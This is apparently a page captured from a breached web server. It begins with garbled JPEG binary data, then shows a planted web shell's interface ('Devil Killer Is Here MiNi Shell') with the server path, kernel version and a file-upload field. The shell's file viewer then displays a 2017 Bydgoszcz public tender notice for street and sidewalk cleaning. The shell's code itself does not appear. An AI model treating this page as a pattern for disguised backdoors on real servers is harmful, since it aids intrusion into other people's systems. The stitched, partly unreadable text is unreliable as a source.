JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170301/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170301/34185-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.um.bydgoszcz.pl' target='_blank'>http://www.bip.um.bydgoszcz.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 34185 - 2017
              z dnia 2017-03-01 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bydgoszcz: OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Miasta  Bydgoszczy, krajowy numer identyfikacyjny
              , ul.
              ul. Jezuicka 
              1,
              85102  
              Bydgoszcz, woj.
              kujawsko-pomorskie, państwo
              Polska, tel.
              0-52 32 88 157, 5858453, e-mail
              przetargi@um.bydgoszcz.pl, faks
              (052) 58 58 273, 5858833.
              <br />
              Adres strony internetowej (URL): www.bydgoszcz.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.um.bydgoszcz.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Wydział Zamówień Publicznych ul. Grudziądzka 9-15, bud. B, II piętro, pokój 208</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>OCZYSZCZANIE CHODNIKÓW, ŚCIEŻEK ROWEROWYCH, PLACÓW, SCHODÓW I PRZEJŚĆ NA TERENIE MIASTA BYDGOSZCZY W REJONACH I  IX, W 2017r.<br /><b>Numer referencyjny: </b>WZP.271.7.2017.B<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  
                    maksymalnej liczby części 6<br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />6<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b><br /><br /><b>II.5) Główny kod CPV: </b>90511100-2<br /><b> Dodatkowe kody CPV:</b>90610000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 30<br /></div><br /><b>II.9) Informacje dodatkowe: </b>TERMIN WYKONANIA ZAMÓWIENIA:                          
1. W terminie 30 dni od daty zawarcia umowy, jednak nie wcześniej niż 20 marca 2017r. 
2.Zamawiający zastrzega sobie prawo do zmiany terminu wykonania umowy (harmonogramu realizacji prac) w przypadku wystąpienia niesprzyjających warunków atmosferycznych, takich jak przymrozki, z gołoledź, opady śniegu lub deszczu,  z zastrzeżeniem pkt. XIII pkt. 2 ppkt. 2) siwz, tj. Zamawiający będzie przyznawał punkty w zakresie kryterium: termin wykonania zamówienia. W tym kryterium Wykonawca może otrzymać max. 40 pkt. Wykonawca może skrócić termin wykonania zamówienia. Punktacja będzie przyznawana w następujący sposób, za udzielony termin wykonania zamówienia:
a) 27 dni - 30 dni, Wykonawca otrzyma 10 pkt. w tym kryterium,
b) 23 dni - 26 dni, Wykonawca otrzyma 20 pkt. w tym kryterium,
c) 22 dni - 21 dni, Wykonawca otrzyma 30 pkt. w tym kryterium,
d) do 20 dni, Wykonawca otrzyma 40 pkt. w tym kryterium.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca  musi wykazać, że posiada doświadczenie w postaci:
a) jednego zamówienia w przedmiocie oczyszczania chodników lub ścieżek rowerowych lub schodów, lub przejść, w przypadku złożenia oferty na jeden lub dwa rejony,
b) max. dwóch zamówień w przedmiocie oczyszczania chodników lub ścieżek rowerowych, lub schodów, lub przejść, w przypadku złożenia oferty na trzy rejony,
c) max. trzech zamówień w przedmiocie oczyszczania chodników lub ścieżek rowerowych, lub schodów, lub przejść, w przypadku złożenia oferty na cztery lub pięć rejonów,
d) max. cztery zamówienia w przedmiocie oczyszczania chodników lub ścieżek rowerowych, lub schodów, lub przejść, w przypadku złożenia oferty na sześć rejonów,
na łączną wartość stanowiącą sumę kwot dla rejonów określonych w poniższej tabeli, na które wykonawca składa ofertę, tj.:
Nr rejonu	Kwota (brutto)
I	5.000,-  zł
II	20.000,- zł
III	20.000,- zł
IV	40.000,- zł
V	10.000,- zł
VI	10.000,- zł
VII	5.000,- zł
VIII	25.000,- zł
IX	10.000,- zł<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt. 1 uPzp</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów spełniających warunek określony w pkt. III.1.3) lit. a lub b, lub c lub d ogłoszenia, na rzecz których usługi zostały wykonane, z załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przed podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Pełnomocnictwo (jeśli dotyczy),
2. Zobowiązanie podmiotu trzeciego, na którego zdolnościach polega wykonawca, na zasadach określonych w art. 22a uPzp (jeżeli dotyczy),
3. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w pkt III.3) ogłoszenia składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to musi potwierdzać spełnianie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków oraz brak podstaw wykluczenia, 
4. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełnienia - w zakresie, w jakim powołuje się na ich zasoby - warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w oświadczeniu, o którym mowa w pkt. III.3)ogłoszenia, 
5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt III.4) ogłoszenia - składa dokument/y wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
6. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów o których mowa w pkt. 5), zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby, 
7. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 uPzp, przekaże Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 uPzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia, 
8. Wymagania Zamawiającego dotyczące zatrudniania osób na umowę o pracę.
1) Zgodnie z art. 29 ust. 3a uPzp Zamawiający wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie umowy o pracę osób, które będą wykonywać czynności określone w opisie przedmiotu zamówienia polegające na:
a) oczyszczaniu chodników, ścieżek rowerowych , schodów, i przejść, 
b) wywozie odpadów, 
objętych niniejszym postępowaniem. 
Wykonawca jest zobowiązany zawrzeć w każdej umowie o podwykonawstwo stosowne zapisy zobowiązujące podwykonawców do zatrudnienia na umowę o pracę wszystkich osób, które wykonują prace w sposób określony w art. 22 § 1 Kodeksu pracy. 
2) dokumentowanie zatrudnienia osób wykonujących wskazane w ppkt. 1) czynności polegać będzie na:
a) na etapie składania ofert- Wykonawca składa oświadczenie w formularzu oferty, 
b) na etapie po zawarciu umowy- wykaz osób z podaniem  imion i nazwisk pracowników zatrudnionych na umowę o pracę i rodzaju umowy o pracę i wymiaru czasu pracy,
c) na etapie realizacji umowy  na żądanie Zamawiającego Wykonawca będzie przedstawiał listę osób zatrudnionych na umowę o pracę (z podaniem  imion i nazwisk pracowników zatrudnionych na umowę o pracę i rodzaju umowy o pracę i wymiaru czasu pracy) wraz ze stosowną informacją z ZUS (druk RCA) potwierdzającą odpowiednią ilość osób zatrudnionych na umowę o pracę, za które odprowadzane są składki ubezpieczeniowe.
3) uprawnienia Zamawiającego odnośnie kontroli spełniania przez wykonawcę wymagań, o których mowa w art. 29 ust. 3 uPzp oraz sankcje z tytułu niespełniania tych wymagań zawarte są we wzorze umowy, stanowiącym załącznik do siwz.   </div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania zamówienia</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
